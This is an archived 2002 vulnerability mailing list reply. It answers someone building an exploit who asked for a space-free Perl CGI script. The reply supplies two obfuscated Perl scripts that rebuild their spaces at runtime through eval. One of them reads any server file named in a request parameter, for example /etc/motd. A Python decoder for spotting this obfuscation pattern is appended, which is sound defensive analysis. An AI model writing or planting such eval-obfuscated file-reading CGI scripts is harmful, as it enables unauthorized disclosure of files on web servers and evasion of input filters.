Vulnerability Development mailing list archives

Re: Coding Conservative CGI Perl

From: Pete Krawczyk <petek () bsod net>
Date: Mon, 10 Jun 2002 13:59:21 -0500 (CDT)

From: Justin Lavoie <acid_rain () programmer net>
Date: Mon, 10 Jun 2002 00:27:05 -0500
Subject: Coding Conservative CGI Perl

}I'm working on a type of exploit and in doing so I must develop a *.cgi
}file that'd run on a Linux and Windows box to allow me to read or upload a
}file (whatever is possible) without the use of spaces!

Well, what would be wrong with:

--- O< ---
#!/usr/bin/perl
$g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
--- O< ---

Or, to, say, read any file on a system:
--- O< ---
#!/usr/bin/perl
$g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n");
print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
--- O< ---
(change the MIME type as necessary)
and call with .cgi?file=/etc/motd

In this case, you'd replace every space with a * between the two hash
marks, and you would have to escape any hash mark or backslash you had,
but as you'll notice, you can do anything you'd like and have it convert
on the fly. You could even change the * to any other character if you'd
like.

Perl is very forgiving about most environments, and you can get around
most restrictions if you try.

-Pete K
-- 
Pete Krawczyk
  petek at bsod dot net
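As an added example from the analysis side (not part of Pete's post): a small Python decoder that recognises the `q#...#` string plus `s/<placeholder>/chr(N)/e` plus `eval` pattern shown above in a Perl script and recovers the code it hides, so someone reviewing a suspicious CGI file can read what it actually does. `SAMPLE` is the first test script from the post embedded as a string; the function names are my own, and the decoder only handles simple literal substitution patterns such as `\*`.

```python
import re

# Constructed sample: the space-free test CGI from the post, as a string.
SAMPLE = r'''#!/usr/bin/perl
$g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
'''

# Closing delimiter for bracketing q() / q{} / q[] / q<>; others close with themselves.
PAIRS = {"(": ")", "{": "}", "[": "]", "<": ">"}
Q_OPEN = re.compile(r'\$(\w+)\s*=\s*q(\W)')                        # $var=q<delim>
SUBST = re.compile(r'\$(\w+)\s*=~\s*s/(.+?)/chr\((\d+)\)/(\w*)')   # $var=~s/pat/chr(N)/eg
EVAL = re.compile(r'eval\s*\(?\s*\$(\w+)')                          # eval($var) or eval $var

def q_strings(src):
    """Map variable name -> raw body of every $var=q<delim>...<delim> assignment."""
    found = {}
    for m in Q_OPEN.finditer(src):
        close = PAIRS.get(m.group(2), m.group(2))
        end = src.find(close, m.end())
        if end != -1:
            found[m.group(1)] = src[m.end():end]
    return found

def deobfuscate(src):
    """Return one finding per variable that is (a) built from a q-string,
    (b) rewritten with s/<placeholder>/chr(N)/e and (c) handed to eval.
    Each finding carries the recovered plaintext code (None if the Perl
    pattern is not also a valid Python regex)."""
    bodies = q_strings(src)
    evaluated = set(EVAL.findall(src))
    findings = []
    for m in SUBST.finditer(src):
        var, pat, code, flags = m.group(1), m.group(2), int(m.group(3)), m.group(4)
        if var not in bodies or "e" not in flags:
            continue
        try:
            decoded = re.sub(pat, chr(code), bodies[var])
        except re.error:
            decoded = None
        findings.append({"var": var, "placeholder": pat, "char": chr(code),
                         "evaluated": var in evaluated, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in deobfuscate(SAMPLE):
        print(f"${f['var']}: {f['placeholder']!r} -> {f['char']!r}, eval={f['evaluated']}")
        print(f["decoded"])
```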
